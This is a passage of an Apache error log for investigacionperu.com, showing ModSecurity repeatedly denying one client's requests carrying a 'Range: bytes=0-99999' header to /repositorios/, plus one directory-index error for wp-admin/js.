"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaKvoDupyaoF2tAudDgAAAMw"] [Mon Feb 17 10:40:24.641871 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:38230] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaKvoDupyaoF2tAudDwAAAMk"] [Mon Feb 17 10:40:24.737033 2025] [:error] [pid 11230:tid 140634165815040] [client 190.102.150.245:38232] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaKvoDupyaoF2tAudEAAAAM4"] [Mon Feb 17 10:40:24.831897 2025] [:error] [pid 11230:tid 140634249742080] [client 190.102.150.245:38234] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaKvoDupyaoF2tAudEQAAAMQ"] [Mon Feb 17 10:40:24.927859 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:38236] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaKvoDupyaoF2tAudEgAAANM"] [Mon Feb 17 10:40:25.022650 2025] [:error] [pid 11230:tid 140634232956672] [client 190.102.150.245:38238] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaavoDupyaoF2tAudEwAAAMY"] [Mon Feb 17 10:40:25.117339 2025] [:error] [pid 11230:tid 140634149029632] [client 190.102.150.245:38240] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaavoDupyaoF2tAudFAAAANA"] [Mon Feb 17 10:40:25.212062 2025] [:error] [pid 11230:tid 140634115458816] [client 190.102.150.245:38242] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaavoDupyaoF2tAudFQAAANQ"] [Mon Feb 17 10:40:25.308280 2025] [:error] [pid 10664:tid 140634174207744] [client 190.102.150.245:38244] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaQJrayd7JfpBdXs8EgAAAI0"] [Mon Feb 17 10:40:25.404074 2025] [:error] [pid 11230:tid 140634354153216] [client 190.102.150.245:38246] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaavoDupyaoF2tAudFgAAAMA"] [Mon Feb 17 10:40:25.498887 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:38248] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaavoDupyaoF2tAudFwAAAME"] [Mon Feb 17 10:40:25.593673 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:38250] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaavoDupyaoF2tAudGAAAANY"] [Mon Feb 17 10:40:25.689092 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:38252] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaavoDupyaoF2tAudGQAAAMc"] [Mon Feb 17 10:40:25.784401 2025] [:error] [pid 11230:tid 140634090280704] [client 190.102.150.245:38254] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaavoDupyaoF2tAudGgAAANc"] [Mon Feb 17 10:40:25.878606 2025] [:error] [pid 10664:tid 140634140636928] [client 190.102.150.245:38256] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaQJrayd7JfpBdXs8EwAAAJE"] [Mon Feb 17 10:40:25.973110 2025] [:error] [pid 10664:tid 140634107066112] [client 190.102.150.245:38258] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaQJrayd7JfpBdXs8FAAAAJU"] [Mon Feb 17 10:40:26.070444 2025] [:error] [pid 10663:tid 140634207778560] [client 190.102.150.245:38260] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYarUcx1xj5z0EGUpRtQAAAEk"] [Mon Feb 17 10:40:26.167843 2025] [:error] [pid 11230:tid 140634241349376] [client 190.102.150.245:38262] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaqvoDupyaoF2tAudGwAAAMU"] [Mon Feb 17 10:40:26.272702 2025] [:error] [pid 11230:tid 140634266527488] [client 190.102.150.245:38264] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaqvoDupyaoF2tAudHAAAAMI"] [Mon Feb 17 10:40:26.370116 2025] [:error] [pid 10663:tid 140634224563968] [client 190.102.150.245:38266] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYarUcx1xj5z0EGUpRtgAAAEc"] [Mon Feb 17 10:40:26.466898 2025] [:error] [pid 10663:tid 140634190993152] [client 190.102.150.245:38268] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYarUcx1xj5z0EGUpRtwAAAEs"] [Mon Feb 17 10:40:26.564477 2025] [:error] [pid 10663:tid 140634174207744] [client 190.102.150.245:38270] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYarUcx1xj5z0EGUpRuAAAAE0"] [Mon Feb 17 10:40:26.662170 2025] [:error] [pid 10663:tid 140634165815040] [client 190.102.150.245:38272] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYarUcx1xj5z0EGUpRuQAAAE4"] [Mon Feb 17 10:40:26.761804 2025] [:error] [pid 10663:tid 140634157422336] [client 190.102.150.245:38274] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYarUcx1xj5z0EGUpRugAAAE8"] [Mon Feb 17 10:40:26.858674 2025] [:error] [pid 11230:tid 140634174207744] [client 190.102.150.245:38276] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaqvoDupyaoF2tAudHQAAAM0"] [Mon Feb 17 10:40:26.955477 2025] [:error] [pid 11230:tid 140634182600448] [client 190.102.150.245:38278] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaqvoDupyaoF2tAudHgAAAMw"] [Mon Feb 17 10:40:27.052140 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:38280] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYa6voDupyaoF2tAudHwAAAMk"] [Mon Feb 17 10:40:27.149282 2025] [:error] [pid 11230:tid 140634165815040] [client 190.102.150.245:38282] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYa6voDupyaoF2tAudIAAAAM4"] [Mon Feb 17 10:40:27.246388 2025] [:error] [pid 10664:tid 140634149029632] [client 190.102.150.245:38284] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYawJrayd7JfpBdXs8FQAAAJA"] [Mon Feb 17 10:40:27.343362 2025] [:error] [pid 10662:tid 140634132244224] [client 190.102.150.245:38286] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYa__97XY8xax64gWTqQAAABI"] [Mon Feb 17 10:40:27.440783 2025] [:error] [pid 10664:tid 140634216171264] [client 190.102.150.245:38288] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYawJrayd7JfpBdXs8FgAAAIg"] [Mon Feb 17 10:40:27.538336 2025] [:error] [pid 11230:tid 140634249742080] [client 190.102.150.245:38290] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYa6voDupyaoF2tAudIQAAAMQ"] [Mon Feb 17 10:40:27.635688 2025] [:error] [pid 10664:tid 140634207778560] [client 190.102.150.245:38292] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYawJrayd7JfpBdXs8FwAAAIk"] [Mon Feb 17 10:40:27.733449 2025] [:error] [pid 10664:tid 140634249742080] [client 190.102.150.245:38294] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYawJrayd7JfpBdXs8GAAAAIQ"] [Mon Feb 17 10:40:27.832070 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:38296] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYa6voDupyaoF2tAudIgAAANM"] [Mon Feb 17 10:40:27.929624 2025] [:error] [pid 10664:tid 140634266527488] [client 190.102.150.245:38298] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYawJrayd7JfpBdXs8GQAAAII"] [Mon Feb 17 10:40:28.026850 2025] [:error] [pid 11230:tid 140634258134784] [client 190.102.150.245:38300] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYbKvoDupyaoF2tAudIwAAAMM"] [Mon Feb 17 10:40:28.123497 2025] [:error] [pid 11230:tid 140634149029632] [client 190.102.150.245:38302] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYbKvoDupyaoF2tAudJAAAANA"] [Mon Feb 17 10:40:28.222018 2025] [:error] [pid 11230:tid 140634354153216] [client 190.102.150.245:38304] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYbKvoDupyaoF2tAudJQAAAMA"] [Mon Feb 17 10:40:28.319353 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:38308] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYbKvoDupyaoF2tAudJgAAAME"] [Mon Feb 17 10:40:28.416675 2025] [:error] [pid 10663:tid 140634132244224] [client 190.102.150.245:38312] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYbLUcx1xj5z0EGUpRuwAAAFI"] [Mon Feb 17 12:02:16.235546 2025] [autoindex:error] [pid 11230:tid 140634090280704] [client 38.252.239.77:33148] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex 